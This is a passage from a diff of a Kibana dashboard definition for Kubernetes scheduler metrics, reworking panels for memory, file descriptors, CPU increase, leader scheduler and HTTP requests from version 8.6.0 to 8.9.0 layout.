"metrics-*", + "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { + "columnOrder": [ + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "301759e0-f73e-4e6d-a7c5-d0938024e989", + "301759e0-f73e-4e6d-a7c5-d0938024e989X1", + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "columns": { + "236eb2de-d45f-43f2-83f4-5a1d7355132b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Increase in Scheduler CPU", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } }, - { - "id": "metrics-*", - "name": "36494898-fe02-477e-9364-d94ea0fcb947", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { - "columnOrder": [ - "6cbab896-ee42-4dad-8831-12f53cda0d6d", - "910bd079-4852-48bd-9d7a-e5eb940f0838", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "96c80749-da61-425a-b637-878d33e410fd", - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX2", - "96c80749-da61-425a-b637-878d33e410fdX1", - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "columns": { - "6cbab896-ee42-4dad-8831-12f53cda0d6d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - 
"params": { - "missingBucket": false, - "orderBy": { - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Resident memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.scheduler.process.memory.resident.bytes, kql='kubernetes.scheduler.process.memory.resident.bytes: *')", - "isFormulaBroken": false - }, - "references": [ - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "scale": "ratio" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.memory.resident.bytes: *" - }, - "isBucketed": false, - "label": "Part of Resident memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" - }, - "96c80749-da61-425a-b637-878d33e410fd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Open file descriptors usage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", - "isFormulaBroken": false - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX2" - ], - "scale": "ratio" - }, - "96c80749-da61-425a-b637-878d33e410fdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.fds.open.count: *" - }, - "isBucketed": false, - 
"label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.fds.open.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.fds.max.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.fds.max.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 114, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", - "type": "function" - } - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.memory.virtual.bytes: *" - }, - "isBucketed": false, - "label": "Virtual memory", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.memory.virtual.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "formula": 
"counter_rate(last_value(kubernetes.scheduler.process.cpu.sec))", + "isFormulaBroken": false + }, + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X1" + ], + "scale": "ratio" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.cpu.sec: *" + }, + "isBucketed": false, + "label": "Part of Increase in Scheduler CPU", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.cpu.sec" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Increase in Scheduler CPU", + "operationType": "counter_rate", + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 20 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "36494898-fe02-477e-9364-d94ea0fcb947", - "key": "kubernetes.scheduler.process.fds.open.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.process.fds.open.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" - }, - { - "alignment": "center", - "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" - }, - { - "alignment": "center", - "columnId": 
"ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "isTransposed": false - }, - { - "alignment": "center", - "colorMode": "text", - "columnId": "96c80749-da61-425a-b637-878d33e410fd", - "isTransposed": false, - "palette": { - "name": "custom", - "params": { - "colorStops": [ - { - "color": "#54B399", - "stop": 0 - }, - { - "color": "#D6BF57", - "stop": 60 - }, - { - "color": "#E7664C", - "stop": 90 - } - ], - "continuity": "above", - "name": "custom", - "rangeMax": null, - "rangeMin": 0, - "rangeType": "number", - "steps": 5, - "stops": [ - { - "color": "#54B399", - "stop": 60 - }, - { - "color": "#D6BF57", - "stop": 90 - }, - { - "color": "#E7664C", - "stop": 91 - } - ] - }, - "type": "palette" - } - } - ], - "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", + "key": "kubernetes.scheduler.process.cpu.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.process.cpu.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.3, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989" + ], + "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - 
"enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "yConfig": [ + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "gridData": { - "h": 6, - "i": "a0716ae8-4157-473d-8eba-8ff6625fed4b", - "w": 24, - "x": 0, - "y": 60 + "preferredSeriesType": "area", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "a0716ae8-4157-473d-8eba-8ff6625fed4b", - "title": "Scheduler process data", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { - "columnOrder": [ - "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "d523e6d2-50f3-4b45-8815-8259df43850c", - "cf481e4f-b568-4306-8da9-5e3d516ccbea", - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "columns": { - "7e1756d9-af1b-4204-a8d4-8c57987216f0": { - "dataType": "string", - "isBucketed": true, - "label": "Top 3 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbea": { - "dataType": "number", - "isBucketed": false, - 
"label": "average(kubernetes.scheduler.process.memory.resident.bytes)", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "formula": "average(kubernetes.scheduler.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "scale": "ratio" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of average(kubernetes.scheduler.process.memory.resident.bytes)", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" - }, - "d523e6d2-50f3-4b45-8815-8259df43850c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage increase over time" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "f8313a9d-ab58-448e-b183-75f914caf53f", + "w": 48, + "x": 0, + "y": 78 + }, + "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(249,235,223,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": 
"metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "HTTP Requests", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "668a51aa-98da-465e-9b09-d49e4f219968", + "w": 24, + "x": 0, + "y": 81 + }, + "panelIndex": "668a51aa-98da-465e-9b09-d49e4f219968", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f3653393-ef8e-45e9-8b91-5a0472ecf752", + "type": "index-pattern" + } + ], + "state": { 
+ "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { + "columnOrder": [ + "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "52732cce-1342-46e1-8273-82efeffe9aac", + "469efac9-749a-455e-9864-90dc0f5f954e", + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" + ], + "columns": { + "37b94d21-2d12-4136-a81d-908d8fc7f78a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "layers": [ - { - "accessors": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbea" - ], - "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "layerType": "data", - "palette": { - "name": "temperature", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", - "yConfig": [] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "orchestrator.cluster.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 18, - "i": "303702e1-ba33-49f2-b337-4cc7d7305606", - "w": 24, - "x": 24, - "y": 60 - }, - "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", - "title": 
"Average resident memory", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" + "469efac9-749a-455e-9864-90dc0f5f954e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { - "columnOrder": [ - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "301759e0-f73e-4e6d-a7c5-d0938024e989", - "301759e0-f73e-4e6d-a7c5-d0938024e989X1", - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "columns": { - "236eb2de-d45f-43f2-83f4-5a1d7355132b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Increase in Scheduler CPU", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.process.cpu.sec))", - "isFormulaBroken": false - }, - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X1" - ], - "scale": "ratio" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.cpu.sec: *" - 
}, - "isBucketed": false, - "label": "Part of Increase in Scheduler CPU", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.cpu.sec" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Increase in Scheduler CPU", - "operationType": "counter_rate", - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 20 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", - "key": "kubernetes.scheduler.process.cpu.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.process.cpu.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "52732cce-1342-46e1-8273-82efeffe9aac": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Leader scheduler name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - 
"yRight": true - }, - "fillOpacity": 0.3, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "hideEndzones": false, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989" - ], - "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "yConfig": [ - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { + "dataType": "boolean", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.leader.is_master: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.scheduler.leader.is_master", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.leader.is_master" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f3653393-ef8e-45e9-8b91-5a0472ecf752", + "key": 
"kubernetes.scheduler.leader.is_master", + "negate": false, + "params": { + "query": true }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "1604f0de-edd6-456e-8670-ab9b33988abb", - "w": 24, - "x": 0, - "y": 66 - }, - "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", - "title": "CPU usage increase over time", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(249,235,223,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "HTTP Requests", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - 
"time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true - }, - "title": "", - "type": "metrics", - "uiState": {} + "type": "phrase" + }, + "query": { + "match_phrase": { + "kubernetes.scheduler.leader.is_master": true } - }, - "gridData": { - "h": 3, - "i": "f8313a9d-ab58-448e-b183-75f914caf53f", - "w": 48, - "x": 0, - "y": 78 - }, - "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", - "title": "", - "type": "visualization", - "version": "8.6.0" + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", + "isTransposed": false, + "width": 256.6666666666667 + }, + { + "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "isTransposed": false, + "width": 345.66666666666663 + } + ], + "headerRowHeight": "auto", + "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "layerType": "data", + "rowHeight": "auto" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Leader scheduler" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "e70eea20-8653-4340-b6dd-620090d3cf7a", + "w": 24, + "x": 24, + "y": 81 + }, + "panelIndex": 
"e70eea20-8653-4340-b6dd-620090d3cf7a", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis > @timestamp > Minimum interval**.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "w": 24, + "x": 24, + "y": 86 + }, + "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { + "columnOrder": [ + "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "8a2e9cea-60fb-4603-a072-9b0e6194344c", + "63268365-bb35-456f-831c-78238984a061", + "63268365-bb35-456f-831c-78238984a061X0", + "63268365-bb35-456f-831c-78238984a061X1", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0", + "00501c90-b23d-4bca-9354-eb2c48236139", + "00501c90-b23d-4bca-9354-eb2c48236139X1", + "00501c90-b23d-4bca-9354-eb2c48236139X0" + ], + "columns": { + 
